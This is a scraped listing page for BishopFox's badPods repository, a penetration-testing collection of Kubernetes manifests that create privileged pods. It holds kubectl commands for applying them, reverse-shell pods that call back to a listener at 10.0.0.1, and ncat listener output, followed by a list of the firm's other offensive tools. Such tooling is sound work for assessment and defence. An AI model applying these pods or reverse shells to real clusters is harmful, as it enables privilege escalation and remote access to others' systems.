BishopFox/badPods BishopFox/badPods

  • Stars
    star
    574
  • Rank 77,184 (Top 2 %)
  • Language
    Shell
  • License
    MIT License
  • Created almost 4 years ago
  • Updated over 2 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
BishopFox/badPods
github

BishopFox

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A collection of manifests that will create pods with elevated privileges.

Bad Pods

A collection of manifests that create pods with different elevated privileges. Quickly demonstrate the impact of allowing security sensitive pod attributes like hostNetwork, hostPID, hostPath, hostIPC, and privileged.

For additional background, see our blog post: Bad Pods: Kubernetes Pod Privilege Escalation.

Contents

The Bad Pods line-up

Each link below provides detailed usage information and post exploitation recommendations.

For more general information about prerequisites, repository organization, and common usage patterns, see the sections below.

Prerequisites

  1. Access to a cluster
  2. RBAC permission to create one of the following resource types in at least one namespace:
    • CronJob, DeamonSet, Deployment, Job, Pod, ReplicaSet, ReplicationController, StatefulSet
  3. RBAC permission to exec into pods or a network policy that allows a reverse shell from a pod to reach you.
  4. No pod security policy enforcement, or a policy that allows pods to be created with one or more security sensitive attributes

Organization

  • 128 self-contained, ready to use manifests. Why so many?
    • 8 Bad Pods (hostpid, hostnetwork, everything-allowed, etc.)
    • 8 resource types that can create pods (pod, deployment, replicaset, statefulset, etc.)
    • 2 ways to access the created pods (exec & reverse shell)
├── manifests
│   ├── everything-allowed
│   │   ├── cronjob
│   │   │   ├── everything-allowed-exec-cronjob.yaml
│   │   │   └── everything-allowed-revshell-cronjob.yaml
│   │   ├── daemonset
│   │   │   ├── everything-allowed-exec-daemonset.yaml
│   │   │   └── everything-allowed-revshell-daemonset.yaml
│   │   ├── deployment
│   │   │   ├── everything-allowed-exec-deployment.yaml
│   │   │   └── everything-allowed-revshell-deployment.yaml
│   │   ├── job
│   │   │   ├── everything-allowed-exec-job.yaml
│   │   │   └── everything-allowed-revshell-job.yaml
│   │   ├── pod
│   │   │   ├── everything-allowed-exec-pod.yaml
│   │   │   └── everything-allowed-revshell-pod.yaml
│   │   ├── replicaset
│   │   │   ├── everything-allowed-exec-replicaset.yaml
│   │   │   └── everything-allowed-revshell-replicaset.yaml
│   │   ├── replicationcontroller
│   │   │   ├── everything-allowed-exec-replicationcontroller.yaml
│   │   │   └── everything-allowed-revshell-replicationcontroller.yaml
│   │   └── statefulset
│   │       ├── everything-allowed-exec-statefulset.yaml
│   │       └── everything-allowed-revshell-statefulset.yaml
│   ├── hostipc
│   │   ├── cronjob
│   │   │   ├── hostipc-exec-cronjob.yaml
│   │   │   └── hostipc-revshell-cronjob.yaml
│   │   ├── daemonset
│   │   │   ├── hostipc-exec-daemonset.yaml
│   │   │   └── hostipc-revshell-daemonset.yaml
...omitted for brevity...

There are eight ways to create a pod

As Eviatar Gerzi (@g3rzi) points out in the post Eight Ways to Create a Pod, there are 8 different controllers that can create a pod, or a set of pods. You might not be authorized to create pods, but maybe you can create another resource type that will create one or more pods. For each badPod type, there are manifests that correspond to all eight resource types.

But wait, it gets worse! In addition to the eight current Kubernetes controllers that can create pods, there are third party controllers that can also create pods if they are applied to the cluster. Keep an eye out for them by looking at kubectl api-resources.

Reverse shells

While common, it is not always the case that you can exec into pods that you can create. To help in those situations, a version of each manifest is included that uses Rory McCune's (@raesene) ncat dockerhub image. When created, the pod will make an encrypted call back to your listener.

Usage

Each resource in the manifests directory targets a specific attribute or a combination of attributes that expose the cluster to risk when allowed.

High level approach

Option 1: Methodical approach

  1. Evaluate RBAC - Determine which resource types you can create
  2. Evaluate Admission Policy - Determine which of the Bad Pods you will be able to create
  3. Create Resources - Based on what is allowed, use the specific badPod type and resource type and create your resources
  4. Post Exploitation - Evaluate post exploitation steps outlined in the README for that type

Option 2: Shotgun approach

  1. Create Resources - Just start applying different manifests and see what works
  2. Post Exploitation - For any created pods, evaluate post exploitation steps outlined in the README for that type

Usage Examples

Create all eight Bad Pods from cloned local repo

kubectl apply -f ./manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl apply -f ./manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl apply -f ./manifests/priv/pod/priv-exec-pod.yaml
kubectl apply -f ./manifests/hostpath/pod/hostpath-exec-pod.yaml
kubectl apply -f ./manifests/hostpid/pod/hostpid-exec-pod.yaml
kubectl apply -f ./manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
kubectl apply -f ./manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f ./manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml

Create all eight Bad Pods from Github

kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml

Create all eight revsere shell badPods

To avoid having to edit each pod with your host and port, you can environment variables and the envsubst command. Remember to spin up all of your listeners first!

HOST="10.0.0.1" PORT="3111" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3112" envsubst < ./manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3113" envsubst < ./manifests/priv/pod/priv-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3114" envsubst < ./manifests/hostpath/pod/hostpath-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3115" envsubst < ./manifests/hostpid/pod/hostpid-revshell-pod.yaml  | kubectl apply -f -
HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3117" envsubst < ./manifests/hostipc/pod/hostipc-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3118" envsubst < ./manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml | kubectl apply -f -

Create a cronjob with the hostNetwork pod

kubectl apply -f manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml

Find the created pod

kubectl get pods | grep cronjob
 
NAME                                        READY   STATUS    RESTARTS   AGE
hostnetwork-exec-cronjob-1607351160-gm2x4   1/1     Running   0          24s

Exec into pod

kubectl exec -it hostnetwork-exec-cronjob-1607351160-gm2x4 -- bash

Create a deployment with the priv-and-hostpid pod

kubectl apply -f manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml

Find the created pod

kubectl get pods | grep deployment

priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9   1/1     Running   0          56s
priv-and-hostpid-exec-deployment-65dbfbf947-tghqh   1/1     Running   0          56s

Exec into pod

kubectl exec -it priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 -- bash

Create all eight resource types using the everything-allowed pod

find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl apply -f {} \;

cronjob.batch/everything-allowed-exec-cronjob created
daemonset.apps/everything-allowed-exec-daemonset created
deployment.apps/everything-allowed-exec-deployment created
job.batch/everything-allowed-exec-job created
pod/everything-allowed-exec-pod created
replicaset.apps/everything-allowed-exec-replicaset created
replicationcontroller/everything-allowed-exec-replicationcontroller created
service/everything-allowed-exec-statefulset-service created
statefulset.apps/everything-allowed-exec-statefulset created

View all of the created pods

kubectl get pods

NAME                                                  READY   STATUS    RESTARTS   AGE
everything-allowed-exec-daemonset-qbrdb               1/1     Running   0          52s
everything-allowed-exec-deployment-6cd7685786-rp65h   1/1     Running   0          51s
everything-allowed-exec-deployment-6cd7685786-m66bl   1/1     Running   0          51s
everything-allowed-exec-job-fhsbt                     1/1     Running   0          50s
everything-allowed-exec-pod                           1/1     Running   0          50s
everything-allowed-exec-replicaset-tlp8v              1/1     Running   0          49s
everything-allowed-exec-replicaset-6znbz              1/1     Running   0          49s
everything-allowed-exec-replicationcontroller-z9k8n   1/1     Running   0          48s
everything-allowed-exec-replicationcontroller-m4648   1/1     Running   0          48s
everything-allowed-exec-statefulset-0                 1/1     Running   0          47s
everything-allowed-exec-statefulset-1                 1/1     Running   0          42s

Delete all everything-allowed resources

find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl delete -f {} \;

Create a reverse shell using the privileged pod

Set up listener

ncat --ssl -vlp 3116

Create pod from local yaml without modifying it by using env variables and envsubst

HOST="10.0.0.1" PORT="3116" envsubst < ./yaml/priv/pod-priv-revshell.yaml | kubectl apply -f -

Catch the shell

ncat --ssl -vlp 3116
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: Listening on :::3116
Ncat: Listening on 0.0.0.0:3116

Connection received on 10.0.0.162 42035

Contributing

Pull requests and issues welcome.

Acknowledgements

Thank you Rory McCune, Duffie Cooley, Brad Geesaman, Tabitha Sable, Ian Coldwater, Mark Manning, Eviatar Gerzi, and Madhu Akula for publicly sharing so much knowledge about Kubernetes offensive security.

References and further reading

Each Bad Pod has it's own references and further reading section, but here are some more general resources that will help you ramp up your Kubernetes security assessments and penetration tests skills.

New kids on the block - 2020

The classics, way back from 2019

More Repositories

1

sliver

Adversary Emulation Framework
Go
8,155
star
2

unredacter

Never ever ever use pixelation as a redaction technique
TypeScript
7,687
star
3

cloudfox

Automating situational awareness for cloud penetration tests.
Go
1,867
star
4

GitGot

Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
Python
1,412
star
5

jsluice

Extract URLs, paths, secrets, and other interesting bits from JavaScript
Go
1,311
star
6

eyeballer

Convolutional neural network for analyzing pentest screenshots
Python
1,017
star
7

spoofcheck

Simple script that checks a domain for email protections
Python
776
star
8

h2csmuggler

HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
Python
632
star
9

bfinject

Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
Objective-C++
619
star
10

GadgetProbe

Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.
Java
578
star
11

iam-vulnerable

Use Terraform to create your own vulnerable by design AWS IAM privilege escalation playground.
HCL
457
star
12

bfdecrypt

Utility to decrypt App Store apps on jailbroken iOS 11.x
C
439
star
13

iSpy

A reverse engineering framework for iOS
Logos
438
star
14

rmiscout

RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities
Java
422
star
15

sj

A tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files.
Go
354
star
16

smogcloud

Find cloud assets that no one wants exposed 🔎 ☁️
Go
329
star
17

cloudfoxable

Create your own vulnerable by design AWS penetration testing playground
Python
311
star
18

sliver-gui

A Sliver GUI Client
TypeScript
288
star
19

dufflebag

Search exposed EBS volumes for secrets
Go
274
star
20

zigdiggity

A ZigBee hacking toolkit by Bishop Fox
Python
258
star
21

deephack

PoC code from DEF CON 25 presentation
Python
240
star
22

rickmote

The Rickmote Controller: Hijack TVs using Google Chromecast
Python
220
star
23

CVE-2023-3519

RCE exploit for CVE-2023-3519
Python
216
star
24

json-interop-vuln-labs

Companion labs to "An Exploration of JSON Interoperability Vulnerabilities"
Python
193
star
25

Imperva_gzip_WAF_Bypass

Python
154
star
26

pwn-pulse

Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)
Shell
136
star
27

firecat

Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network.
C
126
star
28

CVE-2023-27997-check

Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timing
Python
124
star
29

asminject

Heavily-modified fork of David Buchanan's dlinject project. Injects arbitrary assembly (or precompiled binary) payloads directly into x86-64, x86, and ARM32 Linux processes without the use of ptrace by accessing /proc/<pid>/mem. Useful for certain post-exploitation scenarios, recovering content from process memory, etc..
Python
112
star
30

cve-2024-21762-check

Safely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762
Python
93
star
31

anti-anti-automation

Anti-Anti-Automation Framework
Python
92
star
32

mellon

OSDP attack tool (and the Elvish word for friend)
HTML
87
star
33

forticrack

Decrypt encrypted Fortienet FortiOS firmware images
Python
83
star
34

cyberdic

An auxiliary spellcheck dictionary that corresponds with the Bishop Fox Cybersecurity Style Guide
83
star
35

llm-testing-findings

LLM Testing Findings Templates
HTML
65
star
36

bigip-scanner

Determine the running software version of a remote F5 BIG-IP management interface.
Python
61
star
37

IDontSpeakSSL-deprecated

Simple tool based on sslyze to scan large scope and provide SSL/TLS vulnerabilities
Python
51
star
38

spfmap

A program to map out SPF and DKIM records for a large number of domains
Go
37
star
39

CVE-2021-35211

Python
36
star
40

SpoofcheckSelfTest

Web application that lets you test if your domain is vulnerable to email spoofing
Python
33
star
41

ca-clone

Scripts to clone CA certificates for use in HTTPS client attacks.
Shell
33
star
42

ProxyListReliabilityCheck

Perl script to test the reliability of a list of open web proxies.
Perl
27
star
43

ispy-shell

C
24
star
44

coldfusion-10-11-xss

Proof of Concept code for CVE-2015-0345 (APSB15-07)
22
star
45

CVE-2022-22274_CVE-2023-0656

Python
18
star
46

awsservicemap

Go module that returns supported regions for a service or supported services for a region
Go
14
star
47

wordlist-sanitizer

Remove Offensive and Profane Words from Wordlists
Go
12
star
48

sliver-overlord

Go
9
star
49

burpcage

Kotlin
7
star
50

guardian-ci

Shell
4
star
51

You-re-Doing-IoT-RNG

Results and device code from the DEF CON 29 presentation "You're Doing IoT RNG"
C
4
star
52

VulnerableGWTApp

An intentionally-vulnerable GWT-based web application to test tooling and techniques
Java
3
star
53

.github

Bishop Fox Engineering
2
star
54

knownawsaccountslookup

Go module that provides two lookup functions for the data in https://github.com/fwdcloudsec/known_aws_accounts
Go
1
star